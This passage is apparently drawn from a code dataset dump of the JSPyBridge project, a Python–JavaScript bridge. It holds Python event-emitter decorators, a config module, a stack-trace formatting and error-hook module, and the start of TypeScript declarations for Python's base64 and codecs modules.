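# Usage sketch for the event helpers below (illustrative; assumes `emitter`\n# is an EventEmitter proxy obtained through require()):\n#   @On(emitter, \"data\")\n#   def handler(*args): ...\n#   off(emitter, \"data\", handler)\n# You must use this On decorator for an EventEmitter in Node.js, otherwise\n# you will not be able to off an emitter.\ndef On(emitter, event):\n # print(\"On\", emitter, event,onEvent)\n def decor(_fn):\n # Once Colab updates to Node 16, we can remove this.\n # Here we need to manually add in the `this` argument for consistency in Node versions.\n # In JS we could normally just bind `this` but there is no bind in Python.\n if config.node_emitter_patches:\n\n def handler(*args, **kwargs):\n _fn(emitter, *args, **kwargs)\n\n fn = handler\n else:\n fn = _fn\n\n emitter.on(event, fn)\n # We need to do some special things here. Because each Python object\n # on the JS side is unique, EventEmitter is unable to equality check\n # when using .off. So instead we need to avoid the creation of a new\n # PyObject on the JS side. To do that, we need to persist the FFID for\n # this object. Since JS is the authoritative side, this FFID going out\n # of reference on the JS side will cause it to be destroyed on the Python\n # side. 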
Normally this would be an issue; however, it's fine here.\n ffid = getattr(fn, \"iffid\")\n setattr(fn, \"ffid\", ffid)\n config.event_loop.callbacks[ffid] = fn\n return fn\n\n return decor\n\n\n# The extra logic for this Once decorator is basically just to prevent the program\n# from exiting until the event is triggered at least once.\ndef Once(emitter, event):\n def decor(fn):\n i = hash(fn)\n\n def handler(*args, **kwargs):\n if config.node_emitter_patches:\n fn(emitter, *args, **kwargs)\n else:\n fn(*args, **kwargs)\n del config.event_loop.callbacks[i]\n\n emitter.once(event, handler)\n config.event_loop.callbacks[i] = handler\n\n return decor\n\n\ndef off(emitter, event, handler):\n emitter.off(event, handler)\n del config.event_loop.callbacks[getattr(handler, \"ffid\")]\n\n\ndef once(emitter, event):\n val = config.global_jsi.once(emitter, event, timeout=1000)\n return val\n" }, { "alpha_fraction": 0.6985413432121277, "alphanum_fraction": 0.7001620531082153, "avg_line_length": 23.730770111083984, "blob_id": "6d4467dab643ee59990ef663194afb6569c3a328", "content_id": "fc6ce1b26be77bb88c170c993e44b042ea4c8178", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 617, "license_type": "permissive", "max_line_length": 91, "num_lines": 26, "path": "/src/javascript/config.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import os\n\nevent_loop = None\nevent_thread = None\nexecutor = None\n# The \"root\" interface to JavaScript with FFID 0\nglobal_jsi = None\n# Currently this breaks GC\nfast_mode = False\n# Whether we need patches for legacy node versions\nnode_emitter_patches = False\n\n\nif (\"DEBUG\" in os.environ) and (\"jspybridge\" in os.getenv(\"DEBUG\")):\n debug = print\nelse:\n debug = lambda *a: a\n\n\ndef is_main_loop_active():\n if not event_thread or not event_loop:\n return False\n return event_thread.is_alive() and event_loop.active\n\n\n
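# Example: with DEBUG=jspybridge set in the environment (e.g.\n# `DEBUG=jspybridge python3 app.py`), the debug helper above becomes an alias\n# for print; otherwise it is a no-op.\ndead = \"\\n** The Node process has crashed. Please restart the runtime to use JS APIs. 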
**\\n\"\n" }, { "alpha_fraction": 0.530899703502655, "alphanum_fraction": 0.5491520762443542, "avg_line_length": 27.28455352783203, "blob_id": "fd91fdd43bfafd9b28380eeed567894da37d2691", "content_id": "f00d4b93e5c49e4bd62b06b513d610c09e2e7109", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6963, "license_type": "permissive", "max_line_length": 100, "num_lines": 246, "path": "/src/javascript/errors.py", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "import re, sys, traceback\n\n\nclass JavaScriptError(Exception):\n def __init__(self, call, jsStackTrace, pyStacktrace=None):\n self.call = call\n self.js = jsStackTrace\n self.py = pyStacktrace\n\n\nclass Chalk:\n def red(self, text):\n return \"\\033[91m\" + text + \"\\033[0m\"\n\n def blue(self, text):\n return \"\\033[94m\" + text + \"\\033[0m\"\n\n def green(self, text):\n return \"\\033[92m\" + text + \"\\033[0m\"\n\n def yellow(self, text):\n return \"\\033[93m\" + text + \"\\033[0m\"\n\n def bold(self, text):\n return \"\\033[1m\" + text + \"\\033[0m\"\n\n def italic(self, text):\n return \"\\033[3m\" + text + \"\\033[0m\"\n\n def underline(self, text):\n return \"\\033[4m\" + text + \"\\033[0m\"\n\n def gray(self, text):\n return \"\\033[2m\" + text + \"\\033[0m\"\n\n def bgred(self, text):\n return \"\\033[41m\" + text + \"\\033[0m\"\n\n def darkred(self, text):\n return \"\\033[31m\" + text + \"\\033[0m\"\n\n def lightgray(self, text):\n return \"\\033[37m\" + text + \"\\033[0m\"\n\n def white(self, text):\n return \"\\033[97m\" + text + \"\\033[0m\"\n\n\nchalk = Chalk()\n\n\ndef format_line(line):\n if line.startswith(\"<\") or line.startswith(\"\\\\\"):\n return line\n statements = [\n \"const \",\n \"await \",\n \"import \",\n \"let \",\n \"var \",\n \"async \",\n \"self \",\n \"def \",\n \"return \",\n \"from \",\n \"for \",\n \"raise \",\n \"try \",\n \"except \",\n \"catch \",\n \":\",\n \"\\\\(\",\n \"\\\\)\",\n \"\\\\+\",\n \"\\\\-\",\n \"\\\\*\",\n \"=\",\n ]\n secondary = [\"{\", \"}\", \"'\", \" true\", \" false\"]\n for statement in statements:\n exp = re.compile(statement, re.DOTALL)\n line = re.sub(exp, chalk.red(statement.replace(\"\\\\\", \"\")) + \"\", line)\n for second in secondary:\n exp = re.compile(second, re.DOTALL)\n line = re.sub(exp, chalk.blue(second) + \"\", line)\n return line\n\n\ndef print_error(failedCall, jsErrorline, jsStackTrace, jsErrorMessage, pyErrorline, pyStacktrace):\n lines = []\n log = lambda *s: lines.append(\" \".join(s))\n log(\n \"☕\",\n chalk.bold(chalk.bgred(\" JavaScript Error \")),\n f\"Call to '{failedCall.replace('~~', '')}' failed:\",\n )\n\n for at, line in pyStacktrace:\n if \"javascript\" in at or \"IPython\" in at:\n continue\n if not line:\n log(\" \", chalk.gray(at))\n else:\n log(chalk.gray(\">\"), format_line(line))\n log(\" \", chalk.gray(at))\n\n log(chalk.gray(\">\"), format_line(pyErrorline))\n\n log(\"\\n... 
across the bridge ...\\n\")\n\n for traceline in reversed(jsStackTrace):\n log(\" \", chalk.gray(traceline))\n\n log(chalk.gray(\">\"), format_line(jsErrorline))\n log(\"🌉\", chalk.bold(jsErrorMessage))\n\n return lines\n\n\ndef processPyStacktrace(stack):\n lines = []\n error_line = \"\"\n stacks = stack\n\n for lin in stacks:\n lin = lin.rstrip()\n if lin.startswith(\" File\"):\n tokens = lin.split(\"\\n\")\n lin = tokens[0]\n Code = tokens[1] if len(tokens) > 1 else chalk.italic(\"<via standard input>\")\n fname = lin.split('\"')[1]\n line = re.search(r\"\\, line (\\d+)\", lin).group(1)\n at = re.search(r\"\\, in (.*)\", lin)\n if at:\n at = at.group(1)\n else:\n at = \"^\"\n lines.append([f\"at {at} ({fname}:{line})\", Code.strip()])\n elif lin.strip():\n error_line = lin.strip()\n\n return error_line, lines\n\n\nINTERNAL_FILES = [\"bridge.js\", \"pyi.js\", \"errors.js\", \"deps.js\", \"test.js\"]\n\n\ndef isInternal(file):\n for f in INTERNAL_FILES:\n if f in file:\n return True\n return False\n\n\ndef processJsStacktrace(stack, allowInternal=False):\n lines = []\n message_line = \"\"\n error_line = \"\"\n found_main_line = False\n # print(\"Allow internal\", allowInternal)\n stacks = stack if (type(stack) is list) else stack.split(\"\\n\")\n for line in stacks:\n if not message_line:\n message_line = line\n if allowInternal:\n lines.append(line.strip())\n elif (not isInternal(line)) and (not found_main_line):\n abs_path = re.search(r\"\\((.*):(\\d+):(\\d+)\\)\", line)\n file_path = re.search(r\"(file:\\/\\/.*):(\\d+):(\\d+)\", line)\n base_path = re.search(r\"at (.*):(\\d+):(\\d+)$\", line)\n if abs_path or file_path or base_path:\n path = abs_path or file_path or base_path\n fpath, errorline, char = path.groups()\n if fpath.startswith(\"node:\"):\n continue\n with open(fpath, \"r\") as f:\n flines = f.readlines()\n error_line = flines[int(errorline) - 1].strip()\n lines.append(line.strip())\n found_main_line = True\n elif found_main_line:\n lines.append(line.strip())\n\n if allowInternal and not error_line:\n error_line = \"^\"\n return (error_line, message_line, lines) if error_line else None\n\n\ndef getErrorMessage(failed_call, jsStackTrace, pyStacktrace):\n try:\n jse, jsm, jss = processJsStacktrace(jsStackTrace) or processJsStacktrace(jsStackTrace, True)\n pye, pys = processPyStacktrace(pyStacktrace)\n\n lines = print_error(failed_call, jse, jss, jsm, pye, pys)\n return \"\\n\".join(lines)\n except Exception as e:\n print(\"Error in exception handler\")\n import traceback\n\n print(e)\n pys = \"\\n\".join(pyStacktrace)\n print(f\"** JavaScript Stacktrace **\\n{jsStackTrace}\\n** Python Stacktrace **\\n{pys}\")\n return \"\"\n\n\n# Custom exception logic\n\n# Fix for IPython as it blocks the exception hook\n# https://stackoverflow.com/a/28758396/11173996\ntry:\n __IPYTHON__\n import IPython.core.interactiveshell\n\n oldLogger = IPython.core.interactiveshell.InteractiveShell.showtraceback\n\n def newLogger(*a, **kw):\n ex_type, ex_inst, tb = sys.exc_info()\n if ex_type is JavaScriptError:\n pyStacktrace = traceback.format_tb(tb)\n # The Python part of the stack trace is already printed by IPython\n print(getErrorMessage(ex_inst.call, ex_inst.js, pyStacktrace))\n else:\n oldLogger(*a, **kw)\n\n IPython.core.interactiveshell.InteractiveShell.showtraceback = newLogger\nexcept NameError:\n pass\n\norig_excepthook = sys.excepthook\n\n\ndef error_catcher(error_type, error, error_traceback):\n \"\"\"\n Catches JavaScript exceptions and prints them to the console.\n \"\"\"\n if 
error_type is JavaScriptError:\n pyStacktrace = traceback.format_tb(error_traceback)\n jsStacktrace = error.js\n message = getErrorMessage(error.call, jsStacktrace, pyStacktrace)\n print(message, file=sys.stderr)\n else:\n orig_excepthook(error_type, error, error_traceback)\n\n\nsys.excepthook = error_catcher\n# ====\n" }, { "alpha_fraction": 0.6147538423538208, "alphanum_fraction": 0.6185370087623596, "avg_line_length": 31.507774353027344, "blob_id": "28c726dd2e93cef4accf2aee777c92a9249b1a4c", "content_id": "648e5dfa8ce8356a9b127dd1ad08c37efdfd1e17", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": true, "language": "TypeScript", "length_bytes": 443305, "license_type": "permissive", "max_line_length": 814, "num_lines": 13636, "path": "/src/pythonia/py.stdlib.d.ts", "repo_name": "ishan-marikar/JSPyBridge", "src_encoding": "UTF-8", "text": "declare type sqlite3_default = typeof sqlite3.dbapi2\ndeclare type tkinter_default = typeof tkinter.constants\ndeclare module base64 {\n\tvar _\n\n\t/**\n\t * Encode the bytes-like object s using Base64 and return a bytes object.\n\t * \n\t * Optional altchars should be a byte string of length 2 which specifies an\n\t * alternative alphabet for the '+' and '/' characters. This allows an\n\t * application to e.g. generate url or filesystem safe Base64 strings.\n\t * \n\t */\n\tfunction b64encode(s, altchars?): Promise<any>\n\tfunction b64encode$({ s, altchars }: { s, altchars?}): Promise<any>\n\n\t/**\n\t * Decode the Base64 encoded bytes-like object or ASCII string s.\n\t * \n\t * Optional altchars must be a bytes-like object or ASCII string of length 2\n\t * which specifies the alternative alphabet used instead of the '+' and '/'\n\t * characters.\n\t * \n\t * The result is returned as a bytes object. A binascii.Error is raised if\n\t * s is incorrectly padded.\n\t * \n\t * If validate is False (the default), characters that are neither in the\n\t * normal base-64 alphabet nor the alternative alphabet are discarded prior\n\t * to the padding check. If validate is True, these non-alphabet characters\n\t * in the input result in a binascii.Error.\n\t * \n\t */\n\tfunction b64decode(s, altchars?, validate?: boolean): Promise<any>\n\tfunction b64decode$({ s, altchars, validate }: { s, altchars?, validate?}): Promise<any>\n\n\t/**\n\t * Encode bytes-like object s using the standard Base64 alphabet.\n\t * \n\t * The result is returned as a bytes object.\n\t * \n\t */\n\tfunction standard_b64encode(s): Promise<any>\n\tfunction standard_b64encode$({ s }): Promise<any>\n\n\t/**\n\t * Decode bytes encoded with the standard Base64 alphabet.\n\t * \n\t * Argument s is a bytes-like object or ASCII string to decode. The result\n\t * is returned as a bytes object. A binascii.Error is raised if the input\n\t * is incorrectly padded. Characters that are not in the standard alphabet\n\t * are discarded prior to the padding check.\n\t * \n\t */\n\tfunction standard_b64decode(s): Promise<any>\n\tfunction standard_b64decode$({ s }): Promise<any>\n\n\t/**\n\t * Encode bytes using the URL- and filesystem-safe Base64 alphabet.\n\t * \n\t * Argument s is a bytes-like object to encode. The result is returned as a\n\t * bytes object. The alphabet uses '-' instead of '+' and '_' instead of\n\t * '/'.\n\t * \n\t */\n\tfunction urlsafe_b64encode(s): Promise<any>\n\tfunction urlsafe_b64encode$({ s }): Promise<any>\n\n\t/**\n\t * Decode bytes using the URL- and filesystem-safe Base64 alphabet.\n\t * \n\t * Argument s is a bytes-like object or ASCII string to decode. 
The result\n\t * is returned as a bytes object. A binascii.Error is raised if the input\n\t * is incorrectly padded. Characters that are not in the URL-safe base-64\n\t * alphabet, and are not a plus '+' or slash '/', are discarded prior to the\n\t * padding check.\n\t * \n\t * The alphabet uses '-' instead of '+' and '_' instead of '/'.\n\t * \n\t */\n\tfunction urlsafe_b64decode(s): Promise<any>\n\tfunction urlsafe_b64decode$({ s }): Promise<any>\n\tfunction b32encode(s): Promise<any>\n\tfunction b32encode$({ s }): Promise<any>\n\tfunction b32decode(s, casefold?: boolean, map01?): Promise<any>\n\tfunction b32decode$({ s, casefold, map01 }: { s, casefold?, map01?}): Promise<any>\n\tfunction b32hexencode(s): Promise<any>\n\tfunction b32hexencode$({ s }): Promise<any>\n\tfunction b32hexdecode(s, casefold?: boolean): Promise<any>\n\tfunction b32hexdecode$({ s, casefold }: { s, casefold?}): Promise<any>\n\n\t/**\n\t * Encode the bytes-like object s using Base16 and return a bytes object.\n\t * \n\t */\n\tfunction b16encode(s): Promise<any>\n\tfunction b16encode$({ s }): Promise<any>\n\n\t/**\n\t * Decode the Base16 encoded bytes-like object or ASCII string s.\n\t * \n\t * Optional casefold is a flag specifying whether a lowercase alphabet is\n\t * acceptable as input. For security purposes, the default is False.\n\t * \n\t * The result is returned as a bytes object. A binascii.Error is raised if\n\t * s is incorrectly padded or if there are non-alphabet characters present\n\t * in the input.\n\t * \n\t */\n\tfunction b16decode(s, casefold?: boolean): Promise<any>\n\tfunction b16decode$({ s, casefold }: { s, casefold?}): Promise<any>\n\n\t/**\n\t * Encode bytes-like object b using Ascii85 and return a bytes object.\n\t * \n\t * foldspaces is an optional flag that uses the special short sequence 'y'\n\t * instead of 4 consecutive spaces (ASCII 0x20) as supported by 'btoa'. This\n\t * feature is not supported by the \"standard\" Adobe encoding.\n\t * \n\t * wrapcol controls whether the output should have newline (b'\\n') characters\n\t * added to it. If this is non-zero, each output line will be at most this\n\t * many characters long.\n\t * \n\t * pad controls whether the input is padded to a multiple of 4 before\n\t * encoding. Note that the btoa implementation always pads.\n\t * \n\t * adobe controls whether the encoded byte sequence is framed with <~ and ~>,\n\t * which is used by the Adobe implementation.\n\t * \n\t */\n\tfunction a85encode(b): Promise<any>\n\tfunction a85encode$({ b }): Promise<any>\n\n\t/**\n\t * Decode the Ascii85 encoded bytes-like object or ASCII string b.\n\t * \n\t * foldspaces is a flag that specifies whether the 'y' short sequence should be\n\t * accepted as shorthand for 4 consecutive spaces (ASCII 0x20). This feature is\n\t * not supported by the \"standard\" Adobe encoding.\n\t * \n\t * adobe controls whether the input sequence is in Adobe Ascii85 format (i.e.\n\t * is framed with <~ and ~>).\n\t * \n\t * ignorechars should be a byte string containing characters to ignore from the\n\t * input. 
This should only contain whitespace characters, and by default\n\t * contains all whitespace characters in ASCII.\n\t * \n\t * The result is returned as a bytes object.\n\t * \n\t */\n\tfunction a85decode(b): Promise<any>\n\tfunction a85decode$({ b }): Promise<any>\n\n\t/**\n\t * Encode bytes-like object b in base85 format and return a bytes object.\n\t * \n\t * If pad is true, the input is padded with b'\\0' so its length is a multiple of\n\t * 4 bytes before encoding.\n\t * \n\t */\n\tfunction b85encode(b, pad?: boolean): Promise<any>\n\tfunction b85encode$({ b, pad }: { b, pad?}): Promise<any>\n\n\t/**\n\t * Decode the base85-encoded bytes-like object or ASCII string b\n\t * \n\t * The result is returned as a bytes object.\n\t * \n\t */\n\tfunction b85decode(b): Promise<any>\n\tfunction b85decode$({ b }): Promise<any>\n\n\t/**\n\t * Encode a file; input and output are binary files.\n\t */\n\tfunction encode(input, output): Promise<any>\n\tfunction encode$({ input, output }): Promise<any>\n\n\t/**\n\t * Decode a file; input and output are binary files.\n\t */\n\tfunction decode(input, output): Promise<any>\n\tfunction decode$({ input, output }): Promise<any>\n\n\t/**\n\t * Encode a bytestring into a bytes object containing multiple lines\n\t * of base-64 data.\n\t */\n\tfunction encodebytes(s): Promise<any>\n\tfunction encodebytes$({ s }): Promise<any>\n\n\t/**\n\t * Decode a bytestring of base-64 data into a bytes object.\n\t */\n\tfunction decodebytes(s): Promise<any>\n\tfunction decodebytes$({ s }): Promise<any>\n\n\t/**\n\t * Small main program\n\t */\n\tfunction main(): Promise<any>\n\tfunction main$($: {}): Promise<any>\n\tfunction test(): Promise<any>\n\tfunction test$($: {}): Promise<any>\n\tlet bytes_types: Promise<any>\n\tlet MAXLINESIZE: Promise<any>\n\tlet MAXBINSIZE: Promise<any>\n}\ndeclare module codecs {\n\tvar _\n\n\t/**\n\t * Open an encoded file using the given mode and return\n\t * a wrapped version providing transparent encoding/decoding.\n\t * \n\t * Note: The wrapped version will only accept the object format\n\t * defined by the codecs, i.e. Unicode objects for most builtin\n\t * codecs. Output is also codec dependent and will usually be\n\t * Unicode as well.\n\t * \n\t * Underlying encoded files are always opened in binary mode.\n\t * The default file mode is 'r', meaning to open the file in read mode.\n\t * \n\t * encoding specifies the encoding which is to be used for the\n\t * file.\n\t * \n\t * errors may be given to define the error handling. It defaults\n\t * to 'strict' which causes ValueErrors to be raised in case an\n\t * encoding error occurs.\n\t * \n\t * buffering has the same meaning as for the builtin open() API.\n\t * It defaults to -1 which means that the default buffer size will\n\t * be used.\n\t * \n\t * The returned wrapped file object provides an extra attribute\n\t * .encoding which allows querying the used encoding. This\n\t * attribute is only available if an encoding was specified as\n\t * parameter.\n\t * \n\t * \n\t */\n\tfunction open(filename, mode?, encoding?, errors?, buffering?): Promise<any>\n\tfunction open$({ filename, mode, encoding, errors, buffering }: { filename, mode?, encoding?, errors?, buffering?}): Promise<any>\n\n\t/**\n\t * Return a wrapped version of file which provides transparent\n\t * encoding translation.\n\t * \n\t * Data written to the wrapped file is decoded according\n\t * to the given data_encoding and then encoded to the underlying\n\t * file using file_encoding. 
The intermediate data type\n\t * will usually be Unicode but depends on the specified codecs.\n\t * \n\t * Bytes read from the file are decoded using file_encoding and then\n\t * passed back to the caller encoded using data_encoding.\n\t * \n\t * If file_encoding is not given, it defaults to data_encoding.\n\t * \n\t * errors may be given to define the error handling. It defaults\n\t * to 'strict' which causes ValueErrors to be raised in case an\n\t * encoding error occurs.\n\t * \n\t * The returned wrapped file object provides two extra attributes\n\t * .data_encoding and .file_encoding which reflect the given\n\t * parameters of the same name. The attributes can be used for\n\t * introspection by Python programs.\n\t * \n\t * \n\t */\n\tfunction EncodedFile(file, data_encoding, file_encoding?, errors?): Promise<any>\n\tfunction EncodedFile$({ file, data_encoding, file_encoding, errors }: { file, data_encoding, file_encoding?, errors?}): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its encoder function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found.\n\t * \n\t * \n\t */\n\tfunction getencoder(encoding): Promise<any>\n\tfunction getencoder$({ encoding }): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its decoder function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found.\n\t * \n\t * \n\t */\n\tfunction getdecoder(encoding): Promise<any>\n\tfunction getdecoder$({ encoding }): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its IncrementalEncoder class or factory function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found\n\t * or the codecs doesn't provide an incremental encoder.\n\t * \n\t * \n\t */\n\tfunction getincrementalencoder(encoding): Promise<any>\n\tfunction getincrementalencoder$({ encoding }): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its IncrementalDecoder class or factory function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found\n\t * or the codecs doesn't provide an incremental decoder.\n\t * \n\t * \n\t */\n\tfunction getincrementaldecoder(encoding): Promise<any>\n\tfunction getincrementaldecoder$({ encoding }): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its StreamReader class or factory function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found.\n\t * \n\t * \n\t */\n\tfunction getreader(encoding): Promise<any>\n\tfunction getreader$({ encoding }): Promise<any>\n\n\t/**\n\t * Lookup up the codec for the given encoding and return\n\t * its StreamWriter class or factory function.\n\t * \n\t * Raises a LookupError in case the encoding cannot be found.\n\t * \n\t * \n\t */\n\tfunction getwriter(encoding): Promise<any>\n\tfunction getwriter$({ encoding }): Promise<any>\n\n\t/**\n\t * \n\t * Encoding iterator.\n\t * \n\t * Encodes the input strings from the iterator using an IncrementalEncoder.\n\t * \n\t * errors and kwargs are passed through to the IncrementalEncoder\n\t * constructor.\n\t * \n\t */\n\tfunction iterencode(iterator, encoding, errors?): Promise<any>\n\tfunction iterencode$({ iterator, encoding, errors }: { iterator, encoding, errors?}): Promise<any>\n\n\t/**\n\t * \n\t * Decoding iterator.\n\t * \n\t * Decodes the input strings from the iterator using an IncrementalDecoder.\n\t * \n\t * errors and kwargs are passed through to the 
IncrementalDecoder\n\t * constructor.\n\t * \n\t */\n\tfunction iterdecode(iterator, encoding, errors?): Promise<any>\n\tfunction iterdecode$({ iterator, encoding, errors }: { iterator, encoding, errors?}): Promise<any>\n\n\t/**\n\t * make_identity_dict(rng) -> dict\n\t * \n\t * Return a dictionary where elements of the rng sequence are\n\t * mapped to themselves.\n\t * \n\t * \n\t */\n\tfunction make_identity_dict(rng): Promise<any>\n\tfunction make_identity_dict$({ rng }): Promise<any>\n\n\t/**\n\t * Creates an encoding map from a decoding map.\n\t * \n\t * If a target mapping in the decoding map occurs multiple\n\t * times, then that target is mapped to None (undefined mapping),\n\t * causing an exception when encountered by the charmap codec\n\t * during translation.\n\t * \n\t * One example where this happens is cp875.py which decodes\n\t * multiple character to \\u001a.\n\t * \n\t * \n\t */\n\tfunction make_encoding_map(decoding_map): Promise<any>\n\tfunction make_encoding_map$({ decoding_map }): Promise<any>\n\n\t/**\n\t * Codec details when looking up the codec registry\n\t */\n\tinterface ICodecInfo {\n\t}\n\n\t/**\n\t * Defines the interface for stateless encoders/decoders.\n\t * \n\t * The .encode()/.decode() methods may use different error\n\t * handling schemes by providing the errors argument. These\n\t * string values are predefined:\n\t * \n\t * 'strict' - raise a ValueError error (or a subclass)\n\t * 'ignore' - ignore the character and continue with the next\n\t * 'replace' - replace with a suitable replacement character;\n\t * Python will use the official U+FFFD REPLACEMENT\n\t * CHARACTER for the builtin Unicode codecs on\n\t * decoding and '?' on encoding.\n\t * 'surrogateescape' - replace with private code points U+DCnn.\n\t * 'xmlcharrefreplace' - Replace with the appropriate XML\n\t * character reference (only for encoding).\n\t * 'backslashreplace' - Replace with backslashed escape sequences.\n\t * 'namereplace' - Replace with \\N{...} escape sequences\n\t * (only for encoding).\n\t * \n\t * The set of allowed values can be extended via register_error.\n\t * \n\t * \n\t */\n\tinterface ICodec {\n\n\t\t/**\n\t\t * Encodes the object input and returns a tuple (output\n\t\t * object, length consumed).\n\t\t * \n\t\t * errors defines the error handling to apply. It defaults to\n\t\t * 'strict' handling.\n\t\t * \n\t\t * The method may not store state in the Codec instance. Use\n\t\t * StreamWriter for codecs which have to keep state in order to\n\t\t * make encoding efficient.\n\t\t * \n\t\t * The encoder must be able to handle zero length input and\n\t\t * return an empty object of the output object type in this\n\t\t * situation.\n\t\t * \n\t\t * \n\t\t */\n\t\tencode(input, errors?): Promise<any>\n\t\tencode$({ input, errors }: { input, errors?}): Promise<any>\n\n\t\t/**\n\t\t * Decodes the object input and returns a tuple (output\n\t\t * object, length consumed).\n\t\t * \n\t\t * input must be an object which provides the bf_getreadbuf\n\t\t * buffer slot. Python strings, buffer objects and memory\n\t\t * mapped files are examples of objects providing this slot.\n\t\t * \n\t\t * errors defines the error handling to apply. It defaults to\n\t\t * 'strict' handling.\n\t\t * \n\t\t * The method may not store state in the Codec instance. 
Use\n\t\t * StreamReader for codecs which have to keep state in order to\n\t\t * make decoding efficient.\n\t\t * \n\t\t * The decoder must be able to handle zero length input and\n\t\t * return an empty object of the output object type in this\n\t\t * situation.\n\t\t * \n\t\t * \n\t\t */\n\t\tdecode(input, errors?): Promise<any>\n\t\tdecode$({ input, errors }: { input, errors?}): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * An IncrementalEncoder encodes an input in multiple steps. The input can\n\t * be passed piece by piece to the encode() method. The IncrementalEncoder\n\t * remembers the state of the encoding process between calls to encode().\n\t * \n\t */\n\n\t/**\n\t * \n\t * Creates an IncrementalEncoder instance.\n\t * \n\t * The IncrementalEncoder may use different error handling schemes by\n\t * providing the errors keyword argument. See the module docstring\n\t * for a list of possible values.\n\t * \n\t */\n\tfunction IncrementalEncoder(errors?): Promise<IIncrementalEncoder>\n\tfunction IncrementalEncoder$({ errors }: { errors?}): Promise<IIncrementalEncoder>\n\tinterface IIncrementalEncoder {\n\n\t\t/**\n\t\t * \n\t\t * Encodes input and returns the resulting object.\n\t\t * \n\t\t */\n\t\tencode(input, final?: boolean): Promise<any>\n\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Resets the encoder to the initial state.\n\t\t * \n\t\t */\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Return the current state of the encoder.\n\t\t * \n\t\t */\n\t\tgetstate(): Promise<any>\n\t\tgetstate$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Set the current state of the encoder. state must have been\n\t\t * returned by getstate().\n\t\t * \n\t\t */\n\t\tsetstate(state): Promise<any>\n\t\tsetstate$({ state }): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * This subclass of IncrementalEncoder can be used as the baseclass for an\n\t * incremental encoder if the encoder must keep some of the output in a\n\t * buffer between calls to encode().\n\t * \n\t */\n\tfunction BufferedIncrementalEncoder(errors?): Promise<IBufferedIncrementalEncoder>\n\tfunction BufferedIncrementalEncoder$({ errors }: { errors?}): Promise<IBufferedIncrementalEncoder>\n\tinterface IBufferedIncrementalEncoder extends IIncrementalEncoder {\n\t\tencode(input, final?: boolean): Promise<any>\n\t\tencode$({ input, final }: { input, final?}): Promise<any>\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\t\tgetstate(): Promise<any>\n\t\tgetstate$($: {}): Promise<any>\n\t\tsetstate(state): Promise<any>\n\t\tsetstate$({ state }): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * An IncrementalDecoder decodes an input in multiple steps. The input can\n\t * be passed piece by piece to the decode() method. The IncrementalDecoder\n\t * remembers the state of the decoding process between calls to decode().\n\t * \n\t */\n\n\t/**\n\t * \n\t * Create an IncrementalDecoder instance.\n\t * \n\t * The IncrementalDecoder may use different error handling schemes by\n\t * providing the errors keyword argument. 
See the module docstring\n\t * for a list of possible values.\n\t * \n\t */\n\tfunction IncrementalDecoder(errors?): Promise<IIncrementalDecoder>\n\tfunction IncrementalDecoder$({ errors }: { errors?}): Promise<IIncrementalDecoder>\n\tinterface IIncrementalDecoder {\n\n\t\t/**\n\t\t * \n\t\t * Decode input and returns the resulting object.\n\t\t * \n\t\t */\n\t\tdecode(input, final?: boolean): Promise<any>\n\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Reset the decoder to the initial state.\n\t\t * \n\t\t */\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Return the current state of the decoder.\n\t\t * \n\t\t * This must be a (buffered_input, additional_state_info) tuple.\n\t\t * buffered_input must be a bytes object containing bytes that\n\t\t * were passed to decode() that have not yet been converted.\n\t\t * additional_state_info must be a non-negative integer\n\t\t * representing the state of the decoder WITHOUT yet having\n\t\t * processed the contents of buffered_input. In the initial state\n\t\t * and after reset(), getstate() must return (b\"\", 0).\n\t\t * \n\t\t */\n\t\tgetstate(): Promise<any>\n\t\tgetstate$($: {}): Promise<any>\n\n\t\t/**\n\t\t * \n\t\t * Set the current state of the decoder.\n\t\t * \n\t\t * state must have been returned by getstate(). The effect of\n\t\t * setstate((b\"\", 0)) must be equivalent to reset().\n\t\t * \n\t\t */\n\t\tsetstate(state): Promise<any>\n\t\tsetstate$({ state }): Promise<any>\n\t}\n\n\t/**\n\t * \n\t * This subclass of IncrementalDecoder can be used as the baseclass for an\n\t * incremental decoder if the decoder must be able to handle incomplete\n\t * byte sequences.\n\t * \n\t */\n\tfunction BufferedIncrementalDecoder(errors?): Promise<IBufferedIncrementalDecoder>\n\tfunction BufferedIncrementalDecoder$({ errors }: { errors?}): Promise<IBufferedIncrementalDecoder>\n\tinterface IBufferedIncrementalDecoder extends IIncrementalDecoder {\n\t\tdecode(input, final?: boolean): Promise<any>\n\t\tdecode$({ input, final }: { input, final?}): Promise<any>\n\t\treset(): Promise<any>\n\t\treset$($: {}): Promise<any>\n\t\tgetstate(): Promise<any>\n\t\tgetstate$($: {}): Promise<any>\n\t\tsetstate(state): Promise<any>\n\t\tsetstate$({ state }): Promise<any>\n\t}\n\n\t/**\n\t * Creates a StreamWriter instance.\n\t * \n\t * stream must be a file-like object 